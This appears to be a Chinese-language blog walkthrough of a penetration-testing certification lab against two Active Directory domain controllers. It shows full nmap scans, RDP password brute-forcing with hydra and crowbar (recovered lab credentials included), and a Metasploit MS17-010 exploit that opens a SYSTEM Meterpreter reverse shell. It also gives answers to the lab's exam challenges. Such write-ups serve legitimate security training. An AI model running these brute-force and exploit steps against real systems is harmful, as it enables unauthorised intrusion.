AD range (1)
題目:
題目continue:
題目continue:
題目continue:
上述題目的網路架構圖,考試當然不會給這張圖:
打172.16.170.30,相關問題如下:
2 (Challenge 1) What is the 16th Byte NETBIOS name on the machine at 172.25.170.30?
3 (Challenge 2) What is the role of the machine at 172.25.170.30? Based on the 16th byte?
5 (Challenge 4) What is the status of the smb2 signing on the machine at 172.25.170.30?
6 (Challenge 5) What NetBIOS domain name for the machine connected at 172.25.170.30?
7 (Challenge 6) What is the NetBIOS name of the computer at 172.25.170.30?
當然一開場就是nmap掃描:
┌──(kali㉿kali)-[~]
└─$ nmap -p- 172.16.170.30
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 21:25 EDT
Nmap scan report for 172.16.170.30
Host is up (0.048s latency).
Not shown: 65509 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49672/tcp open unknown
49677/tcp open unknown
49690/tcp open unknown
49720/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 35.68 seconds
┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# nmap -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,47001,49664-49672,49677,49690,49720 172.16.170.30 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 21:30 EDT
Nmap scan report for 172.16.170.30
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-02 01:31:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: COMMANDER.LOCALNET, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: COMMANDERTWO)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: COMMANDER.LOCALNET, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: COMMANDERTWO
| NetBIOS_Domain_Name: COMMANDERTWO
| NetBIOS_Computer_Name: COMMANDER
| DNS_Domain_Name: COMMANDER.LOCALNET
| DNS_Computer_Name: COMMANDER.COMMANDER.LOCALNET
| Product_Version: 10.0.14393
|_ System_Time: 2023-04-02T01:32:10+00:00
| ssl-cert: Subject: commonName=COMMANDER.COMMANDER.LOCALNET
| Not valid before: 2023-03-17T02:14:34
|_Not valid after: 2023-09-16T02:14:34
|_ssl-date: 2023-04-02T01:32:20+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp closed unknown
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=4/1%OT=53%CT=49668%CU=43240%PV=Y%DS=2%DC=T%G=Y%TM=6428
OS:DB24%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10F%TI=I%TS=A)OPS(O1=M50
OS:7NW8ST11%O2=M507NW8ST11%O3=M507NW8NNT11%O4=M507NW8ST11%O5=M507NW8ST11%O6
OS:=M507ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF
OS:=Y%T=80%W=2000%O=M507NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%
OS:Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6
OS:(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=N)
Network Distance: 2 hops
Service Info: Host: COMMANDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-02T01:32:12
|_ start_date: 2023-04-02T01:04:49
|_clock-skew: mean: 1h24m00s, deviation: 3h07m50s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: COMMANDER
| NetBIOS computer name: COMMANDER\x00
| Domain name: COMMANDER.LOCALNET
| Forest name: COMMANDER.LOCALNET
| FQDN: COMMANDER.COMMANDER.LOCALNET
|_ System time: 2023-04-01T18:32:11-07:00
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
TRACEROUTE (using port 49668/tcp)
HOP RTT ADDRESS
1 65.06 ms 192.168.200.1
2 14.97 ms 172.16.170.30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.32 seconds
Challenge 4 What is the status of the smb2 signing on the machine at 172.25.170.30?,答案是enabled:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Challenge 5 What NetBIOS domain name for the machine connected at 172.25.170.30?,要看3389的結果,是COMMANDERTWO。
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: COMMANDERTWO
| NetBIOS_Domain_Name: COMMANDERTWO
| NetBIOS_Computer_Name: COMMANDER
| DNS_Domain_Name: COMMANDER.LOCALNET
| DNS_Computer_Name: COMMANDER.COMMANDER.LOCALNET
| Product_Version: 10.0.14393
|_ System_Time: 2023-04-02T01:32:10+00:00
| ssl-cert: Subject: commonName=COMMANDER.COMMANDER.LOCALNET
Challenge 6: What NetBIOS name of the machine connected at 172.25.170.30?
是commander (要看NetBIOS computer name)。雖然NetBIOS name從外部用nmap掃描可知,但Challenge 1的16th Byte NETBIOS name要入侵後才能得知:
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: COMMANDER
| NetBIOS computer name: COMMANDER\x00
| Domain name: COMMANDER.LOCALNET
| Forest name: COMMANDER.LOCALNET
| FQDN: COMMANDER.COMMANDER.LOCALNET
|_ System time: 2023-04-01T18:32:11-07:00
看到88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-02 01:31:03Z),絕對是AD。接下來正式入侵,看到有3389,先用hydra猜密碼(這裡是用別人的虛擬機):
┌──(root💀kali)-[/home/kali]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt rdp://172.16.170.30
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-01 22:18:15
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1820 login tries (l:35/p:52), ~455 tries per task
[DATA] attacking rdp://172.16.170.30:3389/
[STATUS] 495.00 tries/min, 495 tries in 00:01h, 1332 to do in 00:03h, 4 active
[STATUS] 461.67 tries/min, 1385 tries in 00:03h, 444 to do in 00:01h, 4 active
[3389][rdp] host: 172.16.170.30 login: cpent password: Pa$$w0rd123
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-01 22:22:14
而現在筆者的虛擬機(而且還不能用moba連的去打,只能直接用虛擬機)只有裝了crowbar才能爆破,指令如下:
┌──(root㉿kali)-[/home/kali]
└─# crowbar -b rdp -s 172.16.170.30/32 -U Usernames-CPENT.txt -C Passwords-CPENT.txt -v
2023-04-23 00:44:29 START
2023-04-23 00:44:29 Crowbar v0.4.2
2023-04-23 00:44:29 Brute Force Type: rdp
2023-04-23 00:44:29 Output File: /home/kali/crowbar.out
2023-04-23 00:44:29 Log File: /home/kali/crowbar.log
2023-04-23 00:44:29 Discover Mode: False
2023-04-23 00:44:29 Verbose Mode: 1
2023-04-23 00:44:29 Debug Mode: False
2023-04-23 00:44:29 Trying 172.16.170.30:3389
2023-04-23 00:44:29 LOG-RDP: 172.16.170.30:3389 - administrator:password
2023-04-23 00:44:29 LOG-RDP: 172.16.170.30:3389 - administrator:123456
2023-04-23 00:44:29 LOG-RDP: 172.16.170.30:3389 - administrator:cooper
2023-04-23 00:44:29 LOG-RDP: 172.16.170.30:3389 - administrator:diamond
2023-04-23 00:44:29 LOG-RDP: 172.16.170.30:3389 - administrator:12345678
2023-04-23 00:44:30 LOG-RDP: 172.16.170.30:3389 - administrator:12345
2023-04-23 00:44:30 LOG-RDP: 172.16.170.30:3389 - administrator:scorpio
2023-04-23 00:44:30 LOG-RDP: 172.16.170.30:3389 - administrator:qwerty
2023-04-23 00:44:30 LOG-RDP: 172.16.170.30:3389 - administrator:testing
2023-04-23 00:44:30 LOG-RDP: 172.16.170.30:3389 - administrator:jasmine
2023-04-23 00:44:31 LOG-RDP: 172.16.170.30:3389 - administrator:kevin
...so many
2023-04-23 00:49:05 LOG-RDP: 172.16.170.30:3389 - cpent:puppettwo
2023-04-23 00:49:05 LOG-RDP: 172.16.170.30:3389 - cpent:studentpw
2023-04-23 00:49:05 RDP-SUCCESS : 172.16.170.30:3389 - cpent:Pa$$w0rd123
2023-04-23 00:49:05 LOG-RDP: 172.16.170.30:3389 - cpent:cpent123
2023-04-23 00:49:06 LOG-RDP: 172.16.170.30:3389 - cpent:cpent@123
2023-04-23 00:49:06 LOG-RDP: 172.16.170.30:3389 - cpent:cpent123456
...so many
2023-04-23 00:50:18 LOG-RDP: 172.16.170.30:3389 - :eccpw
2023-04-23 00:50:18 LOG-RDP: 172.16.170.30:3389 - :
2023-04-23 00:50:19 STOP
爆破出密碼後,用rdesktop登入:
┌──(kali㉿kali)-[~]
└─$ rdesktop 172.16.170.30 -g 90%
Autoselecting keyboard map 'en-us' from locale
ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);
1. Certificate issuer is not trusted by this system.
Issuer: CN=COMMANDER.COMMANDER.LOCALNET
Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:
Subject: CN=COMMANDER.COMMANDER.LOCALNET
Issuer: CN=COMMANDER.COMMANDER.LOCALNET
Valid From: Thu Mar 16 22:14:34 2023
To: Fri Sep 15 22:14:34 2023
Certificate fingerprints:
sha1: d36c7fa38851287a661e4293b1a0fea6ff04f3a8
sha256: 9701cc5a9f72839068a4191941e1ced3728b85b9c11b5ea71f409b90bc0a6ce8
Do you trust this certificate (yes/no)? yes
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
登入畫面,輸入cpent/Pa$$w0rd123
登入後會出現這個dash board
google netbios如何查詢
來根據上圖反藍處打打看指令:
用-n參數來列出local NETBIOS names:
Challenge 1 What is the 16th Byte NETBIOS name on the machine at 172.25.170.30?
1C
Challenge 2:
What is the role of the machine at 172.25.170.30? Based on the 16th byte?
答案如下圖:
接下來打172.25.170.200,相關問題:
4 (Challenge 3) What is the 16th Byte NETBIOS name of the machine at 172.25.170.200?
8 (Challenge 7) What is the domain name on the machine at 172.25.170.200?
9 (Challenge 8) What is the status of the smb2 signing on the machine at 172.25.170.200?
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.170.200
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 22:14 EDT
Nmap scan report for 172.16.170.200
Host is up (0.024s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49169/tcp open unknown
49192/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 104.59 seconds
┌──(root㉿kali)-[~]
└─# nmap -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49154-49159,49169,49192 172.16.170.200 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 22:21 EDT
Nmap scan report for 172.16.170.200
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-02 02:21:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ECC.LOCALNET, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2012 R2 Datacenter 9600 microsoft-ds (workgroup: ECC)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ECC.LOCALNET, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2023-04-02T02:22:56+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: ECC
| NetBIOS_Domain_Name: ECC
| NetBIOS_Computer_Name: 2012-DC
| DNS_Domain_Name: ECC.LOCALNET
| DNS_Computer_Name: 2012-DC.ECC.LOCALNET
| Product_Version: 6.3.9600
|_ System_Time: 2023-04-02T02:22:17+00:00
| ssl-cert: Subject: commonName=2012-DC.ECC.LOCALNET
| Not valid before: 2023-03-17T01:04:48
|_Not valid after: 2023-09-16T01:04:48
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp filtered unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49192/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 2012-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m49s, median: 0s
| smb2-security-mode:
| 302:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: 2012-DC, NetBIOS user: <unknown>, NetBIOS MAC: 00155d01363f (Microsoft)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2023-04-02T02:22:16
|_ start_date: 2023-04-02T16:04:46
| smb-os-discovery:
| OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: 2012-DC
| NetBIOS computer name: 2012-DC\x00
| Domain name: ECC.LOCALNET
| Forest name: ECC.LOCALNET
| FQDN: 2012-DC.ECC.LOCALNET
|_ System time: 2023-04-01T19:22:16-07:00
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 21.21 ms 192.168.200.1
2 30.99 ms 172.16.170.200
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.62 seconds
Challenge 7:
What is the domain name on the machine at 172.25.170.200?
| smb-os-discovery:
| OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: 2012-DC
| NetBIOS computer name: 2012-DC\x00
| Domain name: ECC.LOCALNET
| Forest name: ECC.LOCALNET
答案ECC.LOCALNET
Challenge 8:
What is the status of the smb2 signing on the machine at 172.25.170.200?
| smb2-security-mode:
| 302:
|_ Message signing enabled and required
查查看:
smb有這些版本:
根據上面網頁反藍處,詳細偵查smb相關的資訊:
┌──(root㉿kali)-[~]
└─# nmap -p445 --script smb-protocols 172.16.170.200
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 23:06 EDT
Nmap scan report for 172.16.170.200
Host is up (0.013s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-protocols:
| dialects:
| NT LM 0.12 (SMBv1) [dangerous, but default]
| 202
| 210
| 300
|_ 302
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
代表smb v1-3全開,截圖要截上面的202、210,跟nmap官網:
也可以從nmap得到答案: Enabled
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
Challenge 3:
What is the 16th Byte NETBIOS name of the machine at 172.25.170.200?
因為smb v1有開,所以不一定是1C。還是要猜密碼進去200看看:
┌──(root💀kali)-[/home/kali]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt rdp://172.16.170.200
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-01 23:22:58
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1820 login tries (l:35/p:52), ~455 tries per task
[DATA] attacking rdp://172.16.170.200:3389/
[3389][rdp] host: 172.16.170.200 login: administrator password: Pa$$w0rd123
[ERROR] freerdp: The connection failed to establish.
有3389 port,所以可以遠端桌面,上面也是猜3389 port的密碼:
┌──(kali㉿kali)-[~]
└─$ rdesktop 172.16.170.200 -g 90%
Autoselecting keyboard map 'en-us' from locale
ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);
1. Certificate issuer is not trusted by this system.
Issuer: CN=2012-DC.ECC.LOCALNET
Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:
Subject: CN=2012-DC.ECC.LOCALNET
Issuer: CN=2012-DC.ECC.LOCALNET
Valid From: Thu Mar 16 21:04:48 2023
To: Fri Sep 15 21:04:48 2023
Certificate fingerprints:
sha1: d38a5cd96f6c6ac2239af2c7135a54086257f5d2
sha256: 72086660adaf8e7628cdd8cef5520604654f2e4d2f3ae0a0fd9583aef90da2ad
Do you trust this certificate (yes/no)? yes
遠端桌面用剛剛猜的管理者帳密登入:
開啟cmd:
所以答案一樣是1C。
而根據nmap的掃瞄,得知smb-security mode如下:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
有以上設定且為2012 R2,合理懷疑ms17-010,所以用msfconsole裡的ms17-010的POC去打:
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 172.16.170.200
rhosts => 172.16.170.200
msf6 exploit(windows/smb/ms17_010_psexec) > set lhost 192.168.200.7
lhost => 192.168.200.7
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.200.7:4444
[*] 172.16.170.200:445 - Target OS: Windows Server 2012 R2 Datacenter 9600
[*] 172.16.170.200:445 - Built a write-what-where primitive...
[+] 172.16.170.200:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.170.200:445 - Selecting PowerShell target
[*] 172.16.170.200:445 - Executing the payload...
[+] 172.16.170.200:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 172.16.170.200
[*] Meterpreter session 1 opened (192.168.200.7:4444 -> 172.16.170.200:51546) at 2023-04-01 07:36:18 -0400
meterpreter > sessions -l
Usage: sessions <id>
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 12
============
Name : Microsoft Hyper-V Network Adapter
Hardware MAC : 00:15:5d:01:36:3f
MTU : 1500
IPv4 Address : 172.16.170.200
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::3081:c951:c3b6:d52
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 13
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:ac10:aac8
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Reference
SMB (Server Message Block) Pentesting | Exploit Notes
Attacking SMB via Metasploit and PSexec
How to Perform SMB Login Control in MSF in Penetration Tests? – SYSTEMCONF
[暴破]暴力破解工具-crowbar | Davidou的 Blog
![[Week4] JS 實作串接 API(三)](https://v61265.coderbridge.io/2020/07/30/week4-js-實作串接-api(三)/?utm_source=coderbridge-io&utm_medium=blog_related_post_img&utm_campaign=little C Blog_[Week4] JS 實作串接 API(三)_@v61265_https://static.coderbridge.com/images/covers/default-post-cover-1.jpg)
:程式基礎(上)_@torai55_https://static.coderbridge.com/images/covers/default-post-cover-2.jpg)
